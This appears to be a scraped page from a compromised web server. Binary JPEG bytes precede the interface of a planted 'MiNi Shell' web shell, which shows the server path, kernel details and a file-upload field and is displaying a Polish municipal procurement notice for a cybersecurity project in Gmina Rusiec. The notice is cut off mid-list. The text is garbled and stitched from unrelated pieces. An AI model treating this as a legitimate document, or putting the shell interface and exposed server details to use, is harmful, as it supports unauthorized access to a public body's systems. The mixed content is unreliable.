JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241125/0061324101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Cyberbezpieczny Samorząd w Gminie Rusiec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RUSIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934708</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wieluńska 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rusiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-438</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@rusiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rusiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Cyberbezpieczny Samorząd w Gminie Rusiec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ff085d0-9578-4e75-acdb-37dc353cbdc2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00613241</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00047383/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Cyberbezpieczny samorząd w Gminie Rusiec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Fundusze Europejskie Priorytet II Zaawansowane usługi cyfrowe działanie 2.2. wzmocnienie krajowego systemu cyberbezpieczeństwa numer naboru FERC.02.02-CS.01-001/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2ff085d0-9578-4e75-acdb-37dc353cbdc2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego pod nazwą „Cyberbezpieczny Samorząd w Gminie Rusiec”, Zamawiający utrzymuje kontakt z Wykonawcami za pośrednictwem Platformy e-Zamówienia. Platforma ta jest dostępna pod adresem https://ezamowienia.gov.pl włączając w to proces składania ofert.<br/>2.	Zamawiający dopuszcza możliwość komunikacji na linii Zamawiający - Wykonawcy za pośrednictwem poczty elektronicznej gmina@rusiec.pl, wyłączając proces składania ofert. <br/>3.	Zamawiający informuje jednocześnie, że korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>4.	Zamawiający informuje, że dokładny adres strony internetowej odnoszący się bezpośrednio do widoku postępowania to: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-2ff085d0-9578-4e75-acdb-37dc353cbdc2.<br/>5.	Zamawiający informuje, że postępowanie można wyszukać również ze strony głównej <br/>Platformy e-Zamówienia. Identyfikator (ID) postępowania: ocds-148610-2ff085d0-9578-4e75-acdb-37dc353cbdc2. <br/>6.	Zamawiający informuje, że każdy Wykonawca, którego zamiarem jest wzięcie udziału w postępowaniu <br/>o udzielenie zamówienia publicznego pod nazwą „Cyberbezpieczny Samorząd w Gminie Rusiec” musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Wszelkie szczegółowe informacje na temat otwierania kont oraz zasady i regulaminy korzystania z Platformy e-Zamówienia określają regulaminy Platformy e-Zamówienia dostępne na stronie https://ezamowienia.gov.pl , w szczególności w zakładce „Centrum Pomocy”. <br/>7.	Zamawiający informuje, że przeglądanie oraz pobieranie treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia.<br/>8.	Zamawiający informuje, że korzystanie w pełnym zakresie z „Formularzy kontaktowych” na Platformie <br/>e-Zamówienia wymaga posiadania konta „Wykonawcy” oraz zalogowania się na Platformie e-Zamówienia. Jednocześnie Zamawiający informuje, że do korzystania z „Formularzy kontaktowych” służących <br/>do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Wszelkie wysłane oraz odebrane wiadomości są widoczne dla Wykonawcy po zalogowaniu się i w podglądzie postępowania w zakładce „Komunikacja”. <br/>9.	Zamawiający informuje, że sposób sporządzania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektronicznej treści musi być zgodny z wymaganiami określonymi <br/>w Rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>10.	Zamawiający informuje, że komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywać się będzie drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce Formularze – „Formularze kontaktowe”. Za pośrednictwem „Formularzy kontaktowych” odbywać się będzie w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielania odpowiedzi. „Formularze kontaktowe” umożliwiają także dodatnie załącznika do przesyłanej wiadomości. <br/><br/>Dalsza część znajduje się w SEKCJI IX - POZOSTAŁE INFORMACJE.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem Pani/Pana danych osobowych jest Urząd Gminy Rusiec reprezentowany przez Wójta Gminy Rusiec Damiana Szczytowskiego,<br/>2)	Administrator wyznaczył Inspektora Ochrony Danych – Pan Rafał Andrzejewski, z którym można skontaktować się pod adresem email: iod.r.andrzejewski@szkoleniaprawnicze.com.pl oraz telefonicznie pod nr telefonu 504 976 690<br/>3)	Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO oraz na podstawie przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2023 r. poz. 1605 z późn. zm.), „ustawa Pzp”; w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji, zawarciem umowy oraz jej realizacją oraz na podstawie art. 6 ust. 1 lit. f RODO. W przypadku przetwarzania danych osobowych na podstawie art. 6 ust. 1 lit. f) RODO za prawnie uzasadniony interes Administratora uznaje się:<br/>a)	ustalenie lub dochodzenie przez Administratora roszczeń cywilnoprawnych wynikających z realizacji niniejszej Umowy, a także obrona przed takimi roszczeniami;<br/>b)	weryfikacja danych osobowych w publicznych rejestrach.<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty upoważnione zgodnie <br/>z przepisami prawa powszechnie obowiązującego, którym udostępniona zostanie dokumentacja postępowania, w tym w szczególności w oparciu o art. 18 oraz art. 74 ustawy Pzp. Odbiorcami państwa danych będą: podmioty i organy, którym Administrator jest zobowiązany lub upoważniony udostępnić dane osobowe na podstawie powszechnie obowiązujących przepisów prawa, oraz podmioty, które na podstawie stosownych umów przetwarzają dane osobowe powierzone do przetwarzania przez Administratora w związku z realizacją usług gwarantujących należyte wykonanie niniejszej Umowy;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. W przypadku zawarcia i realizacji umowy obejmuje również okres niezbędny do zabezpieczenia ewentualnych roszczeń wynikających z umowy, chyba, że przepisy szczegółowe stanowią inaczej;<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp w związku z art. 6 ust. 1 lit. c RODO związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	prawo do wniesienia sprzeciwu wobec przetwarzania danych osobowych, który administrator przetwarza na podstawie art. 6 ust. 1 lit. f RODO w związku z treścią pkt 3) i 5);<br/>Dalsza część w SEKCJI IX - POZOSTAŁE INFORMACJE.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GB5.271.13.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest realizacja usług oraz dostawa sprzętów zgodnie z założeniami projektowymi Zamawiającego zawartymi w projekcie grantowym „Cyberbezpieczny Samorząd w Gminie Rusiec”, a w szczególności:<br/>	usługa wykonania audytów Systemu Zarządzania Bezpieczeństwem Informacji dla Urzędu Gminy Rusiec (2 szt., tj. audyt początkowy oraz audyt końcowy), audyty należy przeprowadzić w zgodności z wymaganiami KRI oraz UoKSC;<br/>	usługa opracowania pełnej dokumentacji z zakresu Systemu Zarządzania Bezpieczeństwem Informacji (1 szt.) dla Urzędu Gminy Rusiec;<br/>	usługa przeprowadzenia szkolenia dla pracowników Urzędu Gminy Rusiec z zakresu <br/>cyberbezpieczeństwa (2 szt.);<br/>	usługa przeprowadzenia szkolenia dla kadry kierowniczej Urzędu Gminy Rusiec z zakresu Systemu Zarządzania Bezpieczeństwa Informacji (1 szt.);<br/>	dostawa rozwiązania do weryfikacji dwuetapowej wraz z konfiguracją i wdrożeniem dla Urzędu Gminy Rusiec;<br/>	dostawa oprogramowania do backupu wraz z wdrożeniem dla Urzędu Gminy Rusiec;<br/>	dostawa serwera wraz z wdrożeniem oraz z zasilaniem awaryjnym dla Urzędu Gminy Rusiec (1 szt.); <br/>	dostawa serwera wraz z wdrożeniem oraz z zasilaniem awaryjnym dla Urzędu Gminy Rusiec (1 szt.).<br/>Szczegółowy opis zawiera Załącznik Nr 1 do SWZ (Opis przedmiotu zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <p class="mb-0">35100000-5 - Urządzenia awaryjne i zabezpieczające</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">72800000-8 - Usługi audytu komputerowego i testowania komputerów</p> <p class="mb-0">72810000-1 - Usługi audytu komputerowego</p> <p class="mb-0">79212000-3 - Usługi audytu</p> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">80532000-2 - Usługi szkolenia w dziedzinie zarządzania</p> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający informuje, że za najkorzystniejszą zostanie uznana oferta, która będzie miała najniższą cenę spośród wszystkich rozpatrywanych i nieodrzuconych ofert. Tym samym Zamawiający informuje, <br/>że za najkorzystniejszą zostanie uznana oferta:<br/>NAJNIŻSZA CENA (CENA BRUTTO) – WAGA 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa warunki udziału w postępowaniu:<br/>1. W zakresie dotyczącym zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku.<br/>2. W zakresie dotyczącym uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku.<br/>3. W zakresie sytuacji ekonomicznej lub finansowej: <br/>– posiadanie polisy ubezpieczeniowej OC na kwotę nie mniejszą niż 300 000,00 (słownie: trzysta tysięcy złotych 00/100) złotych. <br/>4. W zakresie zdolności technicznej lub zawodowej: <br/>– należy wykazać (na Załączniku Nr 4 do SWZ), że Zamawiający skieruje do realizacji zamówienia publicznego osoby, które spełniają warunki w obszarze organizacyjnym i kompetencyjnym (usługi kompetencyjne i szkoleniowe):<br/>•	Zespół audytorski składający się z minimum dwóch audytorów posiadających Certyfikaty Audytora Wiodącego wg normy PN-EN ISO 27001 z akredytacją PCA lub innych certyfikatów wymienionych w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu,<br/>•	Osoba, która ukończyła studia z zakresu ochrony danych osobowych,<br/>•	Osoba z certyfikatem pentestera – Comptia Pentests+ lub równoważnego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o braku przynależności kapitałowej (wymagane oświadczenie również od podmiotów, które udostępniają zasoby Wykonawcy).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">	polisa ubezpieczeniowa w zakresie ubezpieczenia OC na kwotę nie niższą niż 300 000,00 (słownie: trzysta tysięcy złotych 00/100) złotych (rozdział XIV, pkt. 3.3. SWZ);<br/>	wykaz osób.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający informuje, że do przedmiotowych środków dowodowych zalicza (potwierdzone za zgodność z oryginałem należy złożyć wraz z ofertą): <br/><br/>Dostawa sprzętów i oprogramowania: <br/>	dostawa rozwiązania do weryfikacji dwuetapowej wraz z konfiguracją i wdrożeniem dla Urzędu Gminy Rusiec:<br/>•	karta produktowa oferowanego oprogramowania umożliwiająca weryfikację jego parametrów;<br/><br/>	dostawa oprogramowania do backupu wraz z wdrożeniem dla Urzędu Gminy Rusiec;<br/>•	karta produktowa oferowanego oprogramowania umożliwiająca weryfikację jego parametrów;<br/><br/>	dostawa serwera wraz z wdrożeniem oraz z zasilaniem awaryjnym dla Urzędu Gminy Rusiec; <br/>•	karta produktowa oferowanego serwera umożliwiająca weryfikację jego parametrów;<br/>•	oświadczenie producenta serwera w zakresie deklaracji CE dla serwera;<br/>•	oświadczenie producenta serwera, że serwer jest wyprodukowany zgodnie z normą ISO-9001:2015, ISO-500001 oraz ISO-14001;<br/>•	dokument potwierdzający, że sprzęt spełnia wymogi Dyrektywy WEEE 2002/96/EC (wydruk ze strony internetowej www.epeat.net);<br/>•	oświadczenie producenta serwera lub podmiotu realizującego serwis, że w przypadku awarii dysku twardego w urządzeniu objętym aktywnym wsparciem technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego. <br/>•	oświadczenie producenta serwera, że serwis urządzenia będzie realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta;<br/>•	dokument potwierdzający, że firma serwisująca posiada ISO 9001:2015 oraz ISO-27001 na świadczenie usług serwisowych oraz posiada autoryzację producenta urządzenia.<br/><br/>	dostawa serwera wraz z wdrożeniem oraz z zasilaniem awaryjnym dla Urzędu Gminy Rusiec:<br/>•	karta produktowa oferowanego serwera umożliwiająca weryfikację jego parametrów;<br/>•	oświadczenie producenta serwera w zakresie deklaracji CE dla serwera;<br/>•	oświadczenie producenta serwera, że serwer jest wyprodukowany zgodnie z normą ISO-9001:2015, ISO-500001 oraz ISO-14001;<br/>•	dokument potwierdzający, że sprzęt spełnia wymogi Dyrektywy WEEE 2002/96/EC (wydruk ze strony internetowej www.epeat.net);<br/>•	oświadczenie producenta serwera lub podmiotu realizującego serwis, że w przypadku awarii dysku twardego w urządzeniu objętym aktywnym wsparciem technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego. <br/>•	oświadczenie producenta serwera, że serwis urządzenia będzie realizowany bezpośrednio przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta;<br/>•	dokument potwierdzający, że firma serwisująca posiada ISO 9001:2015 oraz ISO-27001 na świadczenie usług serwisowych oraz posiada autoryzację producenta urządzenia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dostawa sprzętów i oprogramowania: <br/>	dostawa rozwiązania do weryfikacji dwuetapowej wraz z konfiguracją i wdrożeniem dla Urzędu Gminy Rusiec:<br/>•	karta produktowa oferowanego oprogramowania umożliwiająca weryfikację jego parametrów;<br/><br/>	dostawa oprogramowania do backupu wraz z wdrożeniem dla Urzędu Gminy Rusiec;<br/>•	karta produktowa oferowanego oprogramowania umożliwiająca weryfikację jego parametrów;<br/><br/>	dostawa serwera wraz z wdrożeniem oraz z zasilaniem awaryjnym dla Urzędu Gminy Rusiec; <br/>•	karta produktowa oferowanego serwera umożliwiająca weryfikację jego parametrów;<br/>•	oświadczenie producenta serwera w zakresie deklaracji CE dla serwera;<br/>•	oświadczenie producenta serwera, że serwer jest wyprodukowany zgodnie z normą ISO-9001:2015, ISO-500001 oraz ISO-14001;<br/>•	dokument 